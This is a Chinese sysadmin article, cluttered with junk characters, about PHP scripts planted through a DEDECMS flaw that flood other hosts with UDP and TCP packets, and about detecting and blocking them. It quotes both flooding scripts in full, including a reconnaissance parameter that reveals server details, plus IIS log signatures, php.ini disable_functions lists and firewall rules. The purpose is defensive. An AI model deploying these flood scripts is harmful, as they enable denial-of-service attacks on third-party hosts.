服务器php对外发包引起崩溃的解决办法paopao最近老听人说,php对外发包,引起服务器崩溃或被机房查封,今天闲着无事和大家一起分享paopao我总结的DEDECMS php对外发包引发服务器崩溃的终极解决方法,希望可以帮助大家解决服务器问题,让网站运行的更好" T( H- L& d" J: t5 `
一。php对外发包分析
, D1 t" I8 Z+ r: V 用php代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
# O3 U: H: `% _- }' b 以下是代码片段:3 t+ D' a: C/ W F) `2 N2 O
$packets = 0;/ A8 v% }* M! R/ h& h, a
$ip = $_GET[\'ip\'];
4 s: C M9 }! I: o4 { $rand = $_GET[\'port\'];
4 B0 i& W# a0 f' [ set_time_limit(0);
0 f/ Y3 N0 x4 K) w5 { ignore_user_abort(FALSE); L0 w& P; q/ d& \4 O! N
$exec_time = $_GET[\'time\'];sbxl-201206125 w9 ]" e1 i8 S: ^
$time = time();: |" I V v7 a+ ~3 l9 i" ?. m
print \'Flooded: $ip on port $rand
8 B2 \( Y8 W5 v \';
! P* S0 x7 C% W [, d( p8 Y5 @ $max_time = $time+$exec_time;
6 s! u5 C3 \7 L5 ] for($i=0;$i<65535;$i++){; d7 E, E, B _/ Y( P
$out .= \'X\';% q N& _: b: H. M3 C
}1 v I: z& h5 c& J5 K* ?, f! f
while(1){$ C1 O, }& H6 I% L) H7 Q
$packets++;
. k! V$ T/ H/ n4 q/ j if(time() > $max_time){
, g! [) Q3 B3 @7 T. _3 b break;9 T! j; K Z' f5 K
}
: `/ {! M |6 h# H6 p' ]1 D. f. d& g $fp = fsockopen(\'udp://$ip\', $rand, $errno, $errstr, 5);
7 F, y1 ^1 w+ z3 Q, L if($fp){% E2 }0 b' H5 g: O2 x X( S7 D3 a
fwrite($fp, $out);) C. O, A+ ?+ }1 ?; \
fclose($fp);( E8 _) ~4 p ?( t0 B" u
}: G" H+ h u! k
}
" H3 k/ L; h* T% W! d echo \'Packet complete at \'.time(\'h:i:s\').\' with) B3 ]" V. j. Y
$packets (\' . round(($packets*65)/1024, 2) . \' mB) packets averaging \'.
0 U1 L9 r" P; H4 E+ R. h& | round($packets/$exec_time, 2) . \' packets/s ;" G5 w9 j. E# t6 u D
?>6 m! M! W Z: Y( {
二。表现特征
- V, a/ w2 B, I6 s M3 Q- @; J$ n 一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是服务器不断收到大量数据包.
& i U1 ]+ _ i5 j; z 近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题.
7 k" R6 {, B; w: a& x$ i 如何快速找到这些站?, X. X1 G2 ^$ M9 t3 W) e7 r: _
你可以打开日志# F: W# Q; ]# D( p+ t! o) ?* e
C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,4 o' w4 w x& j# m1 t) \
里面有类似这样的记录:
& @" c# @8 K4 X. G" d 2012-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
2 w5 \& M! n# a s# }6 l4 l6 l% k* e: | 最后三项783 Disabled 30_FreeHost_1
( ]5 @5 Y& v0 ` Q8 c/ N, k4 G 783就是这个站在IIS中的ID
( N4 \* F. K% G; @- i# ? 30_FreeHost_1就是所在池
2 |5 v) M0 j# q- T- A3 B 三?解决办法$ c$ S/ x2 c. {0 j
1.按上述找到这个网站后停止它.或停止池,并重启IIS.
2 \1 n0 H9 f: b 2.在IP策略,或防火墙中,禁止所有udp向外发送
% s9 f! p# U8 Z3 p 在星外最新版本的安全包中,已带有4.0版本的IP策略【下载safe包】,您导入后就直接可以限制了外发的UDP包?下载这个包,之后导入安全策略?但这个策略并没有关闭DNS端口,部分攻击还是有效.. m; ?+ z3 t* d# Z' K5 u! M% I! m
为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成 地址 从源地址 任何地址 到目标地址'特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8' 保存后就行了): O" A0 X2 t+ @
在2011-4-27,我们上传了新的安全包,里面有一个'星外虚拟主机管理平台IP策略关闭所有UDP端口用.ipsec'文件,您可以导入它并启用,就可以关闭所有udp端口,就可以完全防止这类攻击,但是,这个策略由于关闭了DNS端口,会造成的这台服务器上无法用IE访问任何域名,因此,用户的采集功能也就用不了.(同样,如果在主控网站上用了这个策略,就会造成的受控自检不通过,因为解析不了域名,另外,部分用户反映此策略会造成的mysql不正常)
1 ~7 \" {+ b7 j- F, O 3.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.): x' K1 q# O4 z0 a( _+ @
4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
7 x$ \# e1 ^* e- A' I, Y ignore_user_abort = On
# S0 l! J4 t& t, W( H* }# V5 U3 h (注意前面的;号要删除)
; y7 m- ?7 H" v3 j4 G disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,& L1 q2 z0 A9 V$ O& u# L
在后面加上
7 A& I2 i- W! S( O& ~ fsockopen,set_time_limit) M+ \& s5 f1 V% Z
但这样会造成很多php程序都不正常.( t9 e8 x4 ~- k8 G* C, F" g
另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么?
6 V1 R2 a! x3 R1 Z1 r 近期已有新的基于TCP攻击的PHPDDOS代码如下:7 F" `9 q4 g* P7 h- N
以下是代码片段:/ ?' G/ z& W$ F5 Q8 M/ N) Z
set_time_limit(999999);
/ K# m5 C) ~% {' i. _ $host = $_GET['host'];
; P0 Q' z) l; ~4 | $port = $_GET['port'];
4 f+ |, ~- O9 J7 ?5 x8 p; ]8 {2 l2 Z5 I $exec_time = $_GET['time'];! R! n' J P' S; V- R
$packets = 64;
1 ^0 p5 Q8 G" d; m Y& W; x- { ignore_user_abort(True);4 \# M1 L! l' i. K4 [
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
- }+ J, [4 }: { if (StrLen($_GET['rat'])<>0){
) w$ \! H2 A9 h* R1 r1 p echo $_GET['rat'].$_SERVER['HTTP_HOST'].'|'.GetHostByName($_SERVER['SERVER_NAME']).'|'.( g; k& c% P2 M2 @2 P: }, X) M |
php_uname().'|'.$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];" ]3 I4 w" s% E3 `& V) t; e/ ~1 C0 v
exit;: i- d- ?2 K% A( A, j$ D5 F
}+ W* [( h/ d: t8 V
exit;
2 f5 |* i7 R0 T# B5 z }4 j# l% u" `: |9 [$ h! P+ u
$max_time = time()+$exec_time;, B: n8 u" T! F
while(1){
( [1 W8 `+ L7 ~9 [/ H$ p $packets++;4 p; C+ Y* X% }% U, G4 F8 R" Z0 f
if(time() > $max_time or $exec_time != 69){; o) \9 b E7 T+ `# x
break;: R, U0 d5 k8 U( l$ V! C
}
$ m$ }* d9 X9 S+ J( _5 t# t $fp = fsockopen('tcp://$host', $port, $errno, $errstr, 0);
& p( Y6 _# b3 t2 B }/ `! l7 h5 X+ a! l
?>
. D7 z& } U0 k( K8 h/ Q6 e7 K 同样,可以采有以下解决办法:- k$ `4 X8 L! B2 J) f2 a
1.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
- M. u4 O$ |' r$ ? ignore_user_abort = On4 Y# ] F4 \9 _2 l+ h4 u
(注意前面的;号要删除)/ T2 K3 K1 Z# A/ Y" ?
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
+ m/ j3 j' m3 N% L1 ` 在后面加上
% S f$ K$ t' m# |/ ? fsockopen,set_time_limit
, O, M: t& Z, L' c( a 但这样会造成很多php程序都不正常. 如果您是IDC,给客户提供空间的,禁用函数可能导致客户程序无法运行,所以一般不要用此办法/ @% O. t/ X: q) i/ Z! l" ]0 z* N
2.在IP策略中禁止所有外访的TCP数据包,但这样会造成的采集功能无效,也不能用在主控服务器上?( q) h2 [( t0 p% Z
3.在服务器要用关键词tcp:或udp:搜索所有php类文件,找到攻击文件,删除它?8 d& f! P3 {; U; t* a( E9 `
文章出自医院网站优化 http://www.ahyyqing.com,转载请注明出处。
" {/ t8 g; W7 s* r- S8 ]( T* c3 o& r |
